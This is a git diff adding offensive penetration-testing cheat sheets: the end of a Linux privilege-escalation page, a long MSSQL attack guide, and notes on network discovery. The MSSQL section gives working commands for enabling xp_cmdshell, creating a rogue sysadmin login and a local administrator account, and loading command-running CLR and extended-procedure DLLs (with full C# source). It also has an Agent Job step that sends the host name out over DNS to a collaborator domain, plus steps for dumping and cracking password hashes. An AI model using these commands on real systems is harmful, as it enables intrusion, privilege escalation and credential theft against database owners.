./alpine.tar.gz --alias myimage + +# run the image +lxc init myimage mycontainer -c security.privileged=true + +# mount the /root into the image +lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true + +# interact with the container +lxc start mycontainer +lxc exec mycontainer /bin/sh +``` + +Alternatively https://github.com/initstring/lxd_root + + +## Hijack TMUX session + +Require a read access to the tmux socket : `/tmp/tmux-1000/default`. + +```powershell +export TMUX=/tmp/tmux-1000/default,1234,0 +tmux ls +``` + + +## Kernel Exploits + +Precompiled exploits can be found inside these repositories, run them at your own risk ! +* [bin-sploits - @offensive-security](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits) +* [kernel-exploits - @lucyoa](https://github.com/lucyoa/kernel-exploits/) + +The following exploits are known to work well, search for more exploits with `searchsploit -w linux kernel centos`. + +Another way to find a kernel exploit is to get the specific kernel version and linux distro of the machine by doing `uname -a` +Copy the kernel version and distribution, and search for it in google or in https://www.exploit-db.com/. + +### CVE-2022-0847 (DirtyPipe) + +Linux Privilege Escalation - Linux Kernel 5.8 < 5.16.11 + +``` +https://www.exploit-db.com/exploits/50808 +``` + +### CVE-2016-5195 (DirtyCow) + +Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8 + +```powershell +# make dirtycow stable +echo 0 > /proc/sys/vm/dirty_writeback_centisecs +g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil +https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs +https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c +``` + +### CVE-2010-3904 (RDS) + +Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8 + +```powershell +https://www.exploit-db.com/exploits/15285/ +``` + +### CVE-2010-4258 (Full Nelson) + +Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) + +```powershell +https://www.exploit-db.com/exploits/15704/ +``` + +### CVE-2012-0056 (Mempodipper) + +Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) + +```powershell +https://www.exploit-db.com/exploits/18411 +``` + + +## References + +- [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/) +- [Privilege escalation via Docker - April 22, 2015 - Chris Foster](https://fosterelli.co/privilege-escalation-via-docker.html) +- [An Interesting Privilege Escalation vector (getcap/setcap) - NXNJZ - AUGUST 21, 2018](https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/) +- [Exploiting wildcards on Linux - Berislav Kucan](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/) +- [Code Execution With Tar Command - p4pentest](http://p4pentest.in/2016/10/19/code-execution-with-tar-command/) +- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic](http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt) +- [HOW TO EXPLOIT WEAK NFS PERMISSIONS THROUGH PRIVILEGE ESCALATION? - APRIL 25, 2018](https://www.securitynewspaper.com/2018/04/25/use-weak-nfs-permissions-escalate-linux-privileges/) +- [Privilege Escalation via lxd - @reboare](https://reboare.github.io/lxd/lxd-escape.html) +- [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/) +- [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject) +* [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html) +* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf) +* [SSH Key Predictable PRNG (Authorized_Keys) Process - @weaknetlabs](https://github.com/weaknetlabs/Penetration-Testing-Grimoire/blob/master/Vulnerabilities/SSH/key-exploit.md) +* [The Dirty Pipe Vulnerability](https://dirtypipe.cm4all.com/) diff --git a/docs/pentest/MSSQL Server - Cheatsheet.md b/docs/pentest/MSSQL Server - Cheatsheet.md new file mode 100644 index 0000000..339a736 --- /dev/null +++ b/docs/pentest/MSSQL Server - Cheatsheet.md @@ -0,0 +1,676 @@ +# MSSQL Server + +## Summary + +* [Tools](#tools) +* [Identify Instances and Databases](#identifiy-instaces-and-databases) + * [Discover Local SQL Server Instances](#discover-local-sql-server-instances) + * [Discover Domain SQL Server Instances](#discover-domain-sql-server-instances) + * [Discover Remote SQL Server Instances](#discover-remote-sql-instances) + * [Identify Encrypted databases](#identifiy-encrypted-databases) + * [Version Query](#version-query) +* [Identify Sensitive Information](#identify-sensitive-information) + * [Get Tables from a Specific Database](#get-tables-from-specific-databases) + * [Gather 5 Entries from Each Column](#gather-5-entries-from-each-column) + * [Gather 5 Entries from a Specific Table](#gather-5-entries-from-a-specific-table) + * [Dump common information from server to files](#dump-common-information-from-server-to-files) +* [Linked Database](#linked-database) + * [Find Trusted Link](#find-trusted-link) + * [Execute Query Through The Link](#execute-query-through-the-link) + * [Crawl Links for Instances in the Domain](#crawl-links-for-instances-in-the-domain) + * [Crawl Links for a Specific Instance](#crawl-links-for-a-specific-instance) + * [Query Version of Linked Database](#query-version-of-linked-database) + * [Execute Procedure on Linked Database](#execute-procedure-on-linked-database) + * [Determine Names of Linked Databases ](#determine-names-of-linked-databases) + * [Determine All the Tables Names from a Selected Linked Database](#determine-all-the-tables-names-from-a-selected-linked-database) + * [Gather the Top 5 Columns from a Selected Linked Table](#gather-the-top-5-columns-from-a-selected-linked-table) + * [Gather Entries from a Selected Linked Column](#gather-entries-from-a-selected-linked-column) +* [Command Execution via xp_cmdshell](#command-execution-via-xp_cmdshell) +* [Extended Stored Procedure](#extended-stored-procedure) + * [Add the extended stored procedure and list extended stored procedures](#add-the-extended-stored-procedure-and-list-extended-stored-procedures) +* [CLR Assemblies](#clr-assemblies) + * [Execute commands using CLR assembly](#execute-commands-using-clr-assembly) + * [Manually creating a CLR DLL and importing it](#manually-creating-a-clr-dll-and-importing-it) +* [OLE Automation](#ole-automation) + * [Execute commands using OLE automation procedures](#execute-commands-using-ole-automation-procedures) +* [Agent Jobs](#agent-jobs) + * [Execute commands through SQL Agent Job service](#execute-commands-through-sql-agent-job-service) + * [List All Jobs](#list-all-jobs) +* [External Scripts](#external-scripts) + * [Python](#python) + * [R](#r) +* [Audit Checks](#audit-checks) + * [Find and exploit impersonation opportunities](#find-and-exploit-impersonation-opportunities) +* [Find databases that have been configured as trustworthy](#find-databases-that-have-been-configured-as-trustworthy) +* [Manual SQL Server Queries](#manual-sql-server-queries) + * [Query Current User & determine if the user is a sysadmin](#query-current-user--determine-if-the-user-is-a-sysadmin) + * [Current Role](#current-role) + * [Current DB](#current-db) + * [List all tables](#list-all-tables) + * [List all databases](#list-all-databases) + * [All Logins on Server](#all-logins-on-server) + * [All Database Users for a Database](#all-database-users-for-a-database) + * [List All Sysadmins](#list-all-sysadmins) + * [List All Database Roles](#list-all-database-role) + * [Effective Permissions from the Server](#effective-permissions-from-the-server) + * [Effective Permissions from the Database](#effective-permissions-from-the-database) + * [Find SQL Server Logins Which can be Impersonated for the Current Database](#find-sql-server-logins-which-can-be-impersonated-for-the-current-database) + * [Exploiting Impersonation](#exploiting-impersonation) + * [Exploiting Nested Impersonation](#exploiting-nested-impersonation) + * [MSSQL Accounts and Hashes](#mssql-accounts-and-hashes) +* [References](#references) + +## Tools + +* [NetSPI/PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) - A PowerShell Toolkit for Attacking SQL Server +* [skahwah/SQLRecon](https://github.com/skahwah/SQLRecon/) - A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation. + +## Identify Instances and Databases + +### Discover Local SQL Server Instances + +```ps1 +Get-SQLInstanceLocal +``` + +### Discover Domain SQL Server Instances + +```ps1 +Get-SQLInstanceDomain -Verbose +# Get Server Info for Found Instances +Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose +# Get Database Names +Get-SQLInstanceDomain | Get-SQLDatabase -NoDefaults +``` + +### Discover Remote SQL Server Instances + +```ps1 +Get-SQLInstanceBroadcast -Verbose +Get-SQLInstanceScanUDPThreaded -Verbose -ComputerName SQLServer1 +``` + +### Identify Encrypted databases +Note: These are automatically decrypted for admins + + +```ps1 +Get-SQLDatabase -Username sa -Password Password1234 -Instance "" -Verbose | Where-Object {$_.is_encrypted -eq "True"} +``` + +### Version Query + +```ps1 +Get-SQLInstanceDomain | Get-Query "select @@version" +``` + +## Identify Sensitive Information + +### Get Tables from a Specific Database + +```ps1 +Get-SQLInstanceDomain | Get-SQLTable -DatabaseName -NoDefaults +Get Column Details from a Table +Get-SQLInstanceDomain | Get-SQLColumn -DatabaseName -TableName +``` + + +### Gather 5 Entries from Each Column + + +```ps1 +Get-SQLInstanceDomain | Get-SQLColumnSampleData -Keywords "" -Verbose -SampleSize 5 +``` + +### Gather 5 Entries from a Specific Table + + +```ps1 +Get-SQLQuery -Instance "" -Query 'select TOP 5 * from .dbo.' +``` + + +### Dump common information from server to files + +```ps1 +Invoke-SQLDumpInfo -Verbose -Instance SQLSERVER1\Instance1 -csv +``` + +## Linked Database + +### Find Trusted Link + +```sql +select * from master..sysservers +``` + +### Execute Query Through The Link + +```sql +-- execute query through the link +select * from openquery("dcorp-sql1", 'select * from master..sysservers') +select version from openquery("linkedserver", 'select @@version as version'); + +-- chain multiple openquery +select version from openquery("link1",'select version from openquery("link2","select @@version as version")') + +-- execute shell commands +EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer +select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"') + +-- create user and give admin privileges +EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" +EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" +``` + +### Crawl Links for Instances in the Domain +A Valid Link Will Be Identified by the DatabaseLinkName Field in the Results + + +```ps1 +Get-SQLInstanceDomain | Get-SQLServerLink -Verbose +select * from master..sysservers +``` + +### Crawl Links for a Specific Instance + +```ps1 +Get-SQLServerLinkCrawl -Instance "" -Verbose +select * from openquery("",'select * from openquery("",''select * from master..sysservers'')') +``` + +### Query Version of Linked Database + + +```ps1 +Get-SQLQuery -Instance "" -Query "select * from openquery(`"`",'select @@version')" -Verbose +``` + +### Execute Procedure on Linked Database + +```ps1 +SQL> EXECUTE('EXEC sp_configure ''show advanced options'',1') at "linked.database.local"; +SQL> EXECUTE('RECONFIGURE') at "linked.database.local"; +SQL> EXECUTE('EXEC sp_configure ''xp_cmdshell'',1;') at "linked.database.local"; +SQL> EXECUTE('RECONFIGURE') at "linked.database.local"; +SQL> EXECUTE('exec xp_cmdshell whoami') at "linked.database.local"; +``` + +### Determine Names of Linked Databases + +> tempdb, model ,and msdb are default databases usually not worth looking into. Master is also default but may have something and anything else is custom and definitely worth digging into. The result is DatabaseName which feeds into following query. + +```ps1 +Get-SQLQuery -Instance "" -Query "select * from openquery(`"`",'select name from sys.databases')" -Verbose +``` + +### Determine All the Tables Names from a Selected Linked Database + +> The result is TableName which feeds into following query + + +```ps1 +Get-SQLQuery -Instance "" -Query "select * from openquery(`"`",'select name from .sys.tables')" -Verbose +``` + +### Gather the Top 5 Columns from a Selected Linked Table + +> The results are ColumnName and ColumnValue which feed into following query + + +```ps1 +Get-SQLQuery -Instance "" -Query "select * from openquery(`"`",'select TOP 5 * from .dbo.')" -Verbose +``` + +### Gather Entries from a Selected Linked Column + + +```ps1 +Get-SQLQuery -Instance "" -Query "select * from openquery(`"`"'select * from .dbo. where =')" -Verbose +``` + + +## Command Execution via xp_cmdshell + +> xp_cmdshell disabled by default since SQL Server 2005 + +```ps1 +PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command whoami + +# Creates and adds local user backup to the local administrators group: +PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net user backup Password1234 /add'" -Verbose +PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net localgroup administrators backup /add" -Verbose +``` + +* Manually execute the SQL query + ```sql + EXEC xp_cmdshell "net user"; + EXEC master..xp_cmdshell 'whoami' + EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'; + EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1'; + ``` +* If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005) + ```sql + EXEC sp_configure 'show advanced options',1; + RECONFIGURE; + EXEC sp_configure 'xp_cmdshell',1; + RECONFIGURE; + ``` +* If the procedure was uninstalled + ```sql + sp_addextendedproc 'xp_cmdshell','xplog70.dll' + ``` + + +## Extended Stored Procedure + +### Add the extended stored procedure and list extended stored procedures + +```ps1 +# Create evil DLL +Create-SQLFileXpDll -OutFile C:\temp\test.dll -Command "echo test > c:\temp\test.txt" -ExportName xp_test + +# Load the DLL and call xp_test +Get-SQLQuery -UserName sa -Password Password1234 -Instance "" -Query "sp_addextendedproc 'xp_test', '\\10.10.0.1\temp\test.dll'" +Get-SQLQuery -UserName sa -Password Password1234 -Instance "" -Query "EXEC xp_test" + +# Listing existing +Get-SQLStoredProcedureXP -Instance "" -Verbose +``` + +* Build a DLL using [xp_evil_template.cpp](https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/xp_evil_template.cpp) +* Load the DLL + ```sql + -- can also be loaded from UNC path or Webdav + sp_addextendedproc 'xp_calc', 'C:\mydll\xp_calc.dll' + EXEC xp_calc + sp_dropextendedproc 'xp_calc' + ``` + +## CLR Assemblies + +Prerequisites: +* sysadmin privileges +* CREATE ASSEMBLY permission (or) +* ALTER ASSEMBLY permission (or) + +The execution takes place with privileges of the **service account**. + +### Execute commands using CLR assembly + +```ps1 +# Create C# code for the DLL, the DLL and SQL query with DLL as hexadecimal string +Create-SQLFileCLRDll -ProcedureName "runcmd" -OutFile runcmd -OutDir C:\Users\user\Desktop + +# Execute command using CLR assembly +Invoke-SQLOSCmdCLR -Username sa -Password -Instance -Command "whoami" -Verbose +Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "" -Command "whoami" Verbose +Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "" -Command "powershell -e " -Verbose + +# List all the stored procedures added using CLR +Get-SQLStoredProcedureCLR -Instance -Verbose +``` + +### Manually creating a CLR DLL and importing it + +Create a C# DLL file with the following content, with the command : `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\cmd_exec.cs` + +```csharp +using System; +using System.Data; +using System.Data.SqlClient; +using System.Data.SqlTypes; +using Microsoft.SqlServer.Server; +using System.IO; +using System.Diagnostics; +using System.Text; + +public partial class StoredProcedures +{ + [Microsoft.SqlServer.Server.SqlProcedure] + public static void cmd_exec (SqlString execCommand) + { + Process proc = new Process(); + proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe"; + proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Value); + proc.StartInfo.UseShellExecute = false; + proc.StartInfo.RedirectStandardOutput = true; + proc.Start(); + + // Create the record and specify the metadata for the columns. + SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NVarChar, 4000)); + + // Mark the beginning of the result set. + SqlContext.Pipe.SendResultsStart(record); + + // Set values for each column in the row + record.SetString(0, proc.StandardOutput.ReadToEnd().ToString()); + + // Send the row back to the client. + SqlContext.Pipe.SendResultsRow(record); + + // Mark the end of the result set. + SqlContext.Pipe.SendResultsEnd(); + + proc.WaitForExit(); + proc.Close(); + } +}; +``` + +Then follow these instructions: + +1. Enable `show advanced options` on the server + ```sql + sp_configure 'show advanced options',1; + RECONFIGURE + GO + ``` +2. Enable CLR on the server + ```sql + sp_configure 'clr enabled',1 + RECONFIGURE + GO + ``` +3. Import the assembly + ```sql + CREATE ASSEMBLY my_assembly + FROM 'c:\temp\cmd_exec.dll' + WITH PERMISSION_SET = UNSAFE; + ``` +4. Link the assembly to a stored procedure + ```sql + CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec]; + GO + ``` +5. Execute and clean + ```sql + cmd_exec "whoami" + DROP PROCEDURE cmd_exec + DROP ASSEMBLY my_assembly + ``` + +**CREATE ASSEMBLY** will also accept an hexadecimal string representation of a CLR DLL + +```sql +CREATE ASSEMBLY [my_assembly] AUTHORIZATION [dbo] FROM +0x4D5A90000300000004000000F[TRUNCATED] +WITH PERMISSION_SET = UNSAFE +GO +``` + +## OLE Automation + +* :warning: Disabled by default +* The execution takes place with privileges of the **service account**. + +### Execute commands using OLE automation procedures + +```ps1 +Invoke-SQLOSCmdOle -Username sa -Password Password1234 -Instance "" -Command "whoami" Verbose +``` + +```ps1 +# Enable OLE Automation +EXEC sp_configure 'show advanced options', 1 +EXEC sp_configure reconfigure +EXEC sp_configure 'OLE Automation Procedures', 1 +EXEC sp_configure reconfigure + +# Execute commands +DECLARE @execmd INT +EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT +EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%\system32\cmd.exe /c' +``` + + +```powershell +# https://github.com/blackarrowsec/mssqlproxy/blob/master/mssqlclient.py +python3 mssqlclient.py 'host/username:password@10.10.10.10' -install -clr Microsoft.SqlServer.Proxy.dll +python3 mssqlclient.py 'host/username:password@10.10.10.10' -check -reciclador 'C:\windows\temp\reciclador.dll' +python3 mssqlclient.py 'host/username:password@10.10.10.10' -start -reciclador 'C:\windows\temp\reciclador.dll' +SQL> enable_ole +SQL> upload reciclador.dll C:\windows\temp\reciclador.dll +``` + + +## Agent Jobs + +* The execution takes place with privileges of the **SQL Server Agent service account** if a proxy account is not configured. +* :warning: Require **sysadmin** or **SQLAgentUserRole**, **SQLAgentReaderRole**, and **SQLAgentOperatorRole** roles to create a job. + +### Execute commands through SQL Agent Job service + +```ps1 +Invoke-SQLOSCmdAgentJob -Subsystem PowerShell -Username sa -Password Password1234 -Instance "" -Command "powershell e " -Verbose +Subsystem Options: +–Subsystem CmdExec +-SubSystem PowerShell +–Subsystem VBScript +–Subsystem Jscript +``` + +```sql +USE msdb; +EXEC dbo.sp_add_job @job_name = N'test_powershell_job1'; +EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'$name=$env:COMPUTERNAME[10];nslookup "$name.redacted.burpcollaborator.net"', @retry_attempts = 1, @retry_interval = 5 ; +EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1'; +EXEC dbo.sp_start_job N'test_powershell_job1'; + +-- delete +EXEC dbo.sp_delete_job @job_name = N'test_powershell_job1'; +``` + +### List All Jobs + +```ps1 +SELECT job_id, [name] FROM msdb.dbo.sysjobs; +SELECT job.job_id, notify_level_email, name, enabled, description, step_name, command, server, database_name FROM msdb.dbo.sysjobs job INNER JOIN msdb.dbo.sysjobsteps steps ON job.job_id = steps.job_id +Get-SQLAgentJob -Instance "" -username sa -Password Password1234 -Verbose +``` + +## External Scripts + +:warning: You need to enable **external scripts**. + +```sql +sp_configure 'external scripts enabled', 1; +RECONFIGURE; +``` + +## Python: + +```ps1 +Invoke-SQLOSCmdPython -Username sa -Password Password1234 -Instance "" -Command "powershell -e " -Verbose + +EXEC sp_execute_external_script @language =N'Python',@script=N'import subprocess p = subprocess.Popen("cmd.exe /c whoami", stdout=subprocess.PIPE) OutputDataSet = pandas.DataFrame([str(p.stdout.read(), "utf-8")])' +WITH RESULT SETS (([cmd_out] nvarchar(max))) +``` + +## R + +```ps1 +Invoke-SQLOSCmdR -Username sa -Password Password1234 -Instance "" -Command "powershell -e " -Verbose + +EXEC sp_execute_external_script @language=N'R',@script=N'OutputDataSet <- data.frame(system("cmd.exe /c dir",intern=T))' +WITH RESULT SETS (([cmd_out] text)); +GO + +@script=N'OutputDataSet <-data.frame(shell("dir",intern=T))' +``` + +## Audit Checks + + +### Find and exploit impersonation opportunities + +* Impersonate as: `EXECUTE AS LOGIN = 'sa'` +* Impersonate `dbo` with DB_OWNER + ```sql + SQL> select is_member('db_owner'); + SQL> execute as user = 'dbo' + SQL> SELECT is_srvrolemember('sysadmin') + ``` + +```ps1 +Invoke-SQLAuditPrivImpersonateLogin -Username sa -Password Password1234 -Instance "" -Exploit -Verbose + +# impersonate sa account +powerpick Get-SQLQuery -Instance "" -Query "EXECUTE AS LOGIN = 'sa'; SELECT IS_SRVROLEMEMBER(''sysadmin'')" -Verbose -Debug +``` + +## Find databases that have been configured as trustworthy + +```sql +Invoke-SQLAuditPrivTrustworthy -Instance "" -Exploit -Verbose + +SELECT name as database_name, SUSER_NAME(owner_sid) AS database_owner, is_trustworthy_on AS TRUSTWORTHY from sys.databases +``` + +> The following audit checks run web requests to load Inveigh via reflection. Be mindful of the environment and ability to connect outbound. + +```ps1 +Invoke-SQLAuditPrivXpDirtree +Invoke-SQLUncPathInjection +Invoke-SQLAuditPrivXpFileexist +``` + +## Manual SQL Server Queries + +### Query Current User & determine if the user is a sysadmin + +```sql +select suser_sname() +Select system_user +select is_srvrolemember('sysadmin') +``` + +### Current Role + +```sql +Select user +``` + +### Current DB + +```sql +select db_name() +``` + +### List all tables + +```sql +select table_name from information_schema.tables +``` + +### List all databases + +```sql +select name from master..sysdatabases +``` + +### All Logins on Server + +```sql +Select * from sys.server_principals where type_desc != 'SERVER_ROLE' +``` + +### All Database Users for a Database + +```sql +Select * from sys.database_principals where type_desc != 'database_role'; +``` + +### List All Sysadmins + +```sql +SELECT name,type_desc,is_disabled FROM sys.server_principals WHERE IS_SRVROLEMEMBER ('sysadmin',name) = 1 +``` + +### List All Database Roles + +```sql +SELECT DB1.name AS DatabaseRoleName, +isnull (DB2.name, 'No members') AS DatabaseUserName +FROM sys.database_role_members AS DRM +RIGHT OUTER JOIN sys.database_principals AS DB1 +ON DRM.role_principal_id = DB1.principal_id +LEFT OUTER JOIN sys.database_principals AS DB2 +ON DRM.member_principal_id = DB2.principal_id +WHERE DB1.type = 'R' +ORDER BY DB1.name; +``` + +### Effective Permissions from the Server + +```sql +select * from fn_my_permissions(null, 'server'); +``` + +### Effective Permissions from the Database + +```sql +SELECT * FROM fn_dp1my_permissions(NULL, 'DATABASE'); +``` + +### Find SQL Server Logins Which can be Impersonated for the Current Database + +```sql +select distinct b.name +from sys.server_permissions a +inner join sys.server_principals b +on a.grantor_principal_id = b.principal_id +where a.permission_name = 'impersonate' +``` + +### Exploiting Impersonation + +```sql +SELECT SYSTEM_USER +SELECT IS_SRVROLEMEMBER('sysadmin') +EXECUTE AS LOGIN = 'adminuser' +SELECT SYSTEM_USER +SELECT IS_SRVROLEMEMBER('sysadmin') +SELECT ORIGINAL_LOGIN() +``` + +### Exploiting Nested Impersonation + +```sql +SELECT SYSTEM_USER +SELECT IS_SRVROLEMEMBER('sysadmin') +EXECUTE AS LOGIN = 'stduser' +SELECT SYSTEM_USER +EXECUTE AS LOGIN = 'sa' +SELECT IS_SRVROLEMEMBER('sysadmin') +SELECT ORIGINAL_LOGIN() +SELECT SYSTEM_USER +``` + +### MSSQL Accounts and Hashes + +```sql +MSSQL 2000: +SELECT name, password FROM master..sysxlogins +SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.) + +MSSQL 2005 +SELECT name, password_hash FROM master.sys.sql_logins +SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins +``` + +Then crack passwords using Hashcat : `hashcat -m 1731 -a 0 mssql_hashes_hashcat.txt /usr/share/wordlists/rockyou.txt --force` + +```ps1 +131 MSSQL (2000) 0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578 +132 MSSQL (2005) 0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe +1731 MSSQL (2012, 2014) 0x02000102030434ea1b17802fd95ea6316bd61d2c94622ca3812793e8fb1672487b5c904a45a31b2ab4a78890d563d2fcf5663e46fe797d71550494be50cf4915d3f4d55ec375 +``` + + +## References + +* [PowerUpSQL Cheat Sheet & SQL Server Queries - Leo Pitt](https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-40e1c418edc3) +* [PowerUpSQL Cheat Sheet - Scott Sutherland](https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet) +* [Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017](https://blog.netspi.com/attacking-sql-server-clr-assemblies/) +* [MSSQL Agent Jobs for Command Execution - Nicholas Popovich - September 21, 2016](https://www.optiv.com/explore-optiv-insights/blog/mssql-agent-jobs-command-execution) \ No newline at end of file diff --git a/docs/pentest/Miscellaneous - Tricks.md b/docs/pentest/Miscellaneous - Tricks.md new file mode 100644 index 0000000..e82618b --- /dev/null +++ b/docs/pentest/Miscellaneous - Tricks.md @@ -0,0 +1,27 @@ +# Miscellaneous & Tricks + +All the tricks that couldn't be classified somewhere else. + +## Send a message to another user + +```powershell +# Windows +PS C:\> msg Swissky /SERVER:CRASHLAB "Stop rebooting the XXXX service !" +PS C:\> msg * /V /W /SERVER:CRASHLAB "Hello all !" + +# Linux +$ wall "Stop messing with the XXX service !" +$ wall -n "System will go down for 2 hours maintenance at 13:00 PM" # "-n" only for root +$ who +$ write root pts/2 # press Ctrl+D after typing the message. +``` + +## CrackMapExec Credential Database + +```ps1 +cmedb (default) > workspace create test +cmedb (test) > workspace default +cmedb (test) > proto smb +cmedb (test)(smb) > creds +cmedb (test)(smb) > export creds csv /tmp/creds +``` \ No newline at end of file diff --git a/docs/pentest/Network Discovery.md b/docs/pentest/Network Discovery.md new file mode 100644 index 0000000..8b216cb --- /dev/null +++ b/docs/pentest/Network Discovery.md @@ -0,0 +1,256 @@ +# Network Discovery + +## Summary + +- [Nmap](#nmap) +- [Network Scan with nc and ping](#network-scan-with-nc-and-ping) +- [Spyse](#spyse) +- [Masscan](#masscan) +- [Netdiscover](#netdiscover) +- [Responder](#responder) +- [Bettercap](#bettercap) +- [Reconnoitre](#reconnoitre) +- [SSL MITM with OpenSSL](#ssl-mitm-with-openssl) +- [References](#references) + +## Nmap + +* Ping sweep (No port scan, No DNS resolution) + +```powershell +nmap -sn -n --disable-arp-ping 192.168.1.1-254 | grep -v "host down" +-sn : Disable port scanning. Host discovery only. +-n : Never do DNS resolution +``` + +* Basic NMAP + +```bash +sudo nmap -sSV -p- 192.168.0.1 -oA OUTPUTFILE -T4 +sudo nmap -sSV -oA OUTPUTFILE -T4 -iL INPUTFILE.csv + +• the flag -sSV defines the type of packet to send to the server and tells Nmap to try and determine any service on open ports +• the -p- tells Nmap to check all 65,535 ports (by default it will only check the most popular 1,000) +• 192.168.0.1 is the IP address to scan +• -oA OUTPUTFILE tells Nmap to output the findings in its three major formats at once using the filename "OUTPUTFILE" +• -iL INPUTFILE tells Nmap to use the provided file as inputs +``` + +* CTF NMAP + +This configuration is enough to do a basic check for a CTF VM + +```bash +nmap -sV -sC -oA ~/nmap-initial 192.168.1.1 + +-sV : Probe open ports to determine service/version info +-sC : to enable the script +-oA : to save the results + +After this quick command you can add "-p-" to run a full scan while you work with the previous result +``` + +* Aggressive NMAP + +```bash +nmap -A -T4 scanme.nmap.org +• -A: Enable OS detection, version detection, script scanning, and traceroute +• -T4: Defines the timing for the task (options are 0-5 and higher is faster) +``` + +* Using searchsploit to detect vulnerable services + +```bash +nmap -p- -sV -oX a.xml IP_ADDRESS; searchsploit --nmap a.xml +``` + +* Generating nice scan report + +```bash +nmap -sV IP_ADDRESS -oX scan.xml && xsltproc scan.xml -o "`date +%m%d%y`_report.html" +``` + +* NMAP Scripts + +```bash +nmap -sC : equivalent to --script=default + +nmap --script 'http-enum' -v web.xxxx.com -p80 -oN http-enum.nmap +PORT STATE SERVICE +80/tcp open http +| http-enum: +| /phpmyadmin/: phpMyAdmin +| /.git/HEAD: Git folder +| /css/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)' +|_ /image/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)' + +nmap --script smb-enum-users.nse -p 445 [target host] +Host script results: +| smb-enum-users: +| METASPLOITABLE\backup (RID: 1068) +| Full name: backup +| Flags: Account disabled, Normal user account +| METASPLOITABLE\bin (RID: 1004) +| Full name: bin +| Flags: Account disabled, Normal user account +| METASPLOITABLE\msfadmin (RID: 3000) +| Full name: msfadmin,,, +| Flags: Normal user account + +List Nmap scripts : ls /usr/share/nmap/scripts/ +``` + +## Network Scan with nc and ping + +Sometimes we want to perform network scan without any tools like nmap. So we can use the commands `ping` and `nc` to check if a host is up and which port is open. +To check if hosts are up on a /24 range +```bash +for i in `seq 1 255`; do ping -c 1 -w 1 192.168.1.$i > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "192.168.1.$i is UP"; fi ; done +``` +To check which ports are open on a specific host +```bash +for i in {21,22,80,139,443,445,3306,3389,8080,8443}; do nc -z -w 1 192.168.1.18 $i > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "192.168.1.18 has port $i open"; fi ; done +``` +Both at the same time on a /24 range +```bash +for i in `seq 1 255`; do ping -c 1 -w 1 192.168.1.$i > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "192.168.1.$i is UP:"; for j in {21,22,80,139,443,445,3306,3389,8080,8443}; do nc -z -w 1 192.168.1.$i $j > /dev/null 2>&1; if [ $? -eq 0 ]; then echo "\t192.168.1.$i has port $j open"; fi ; done ; fi ; done +``` 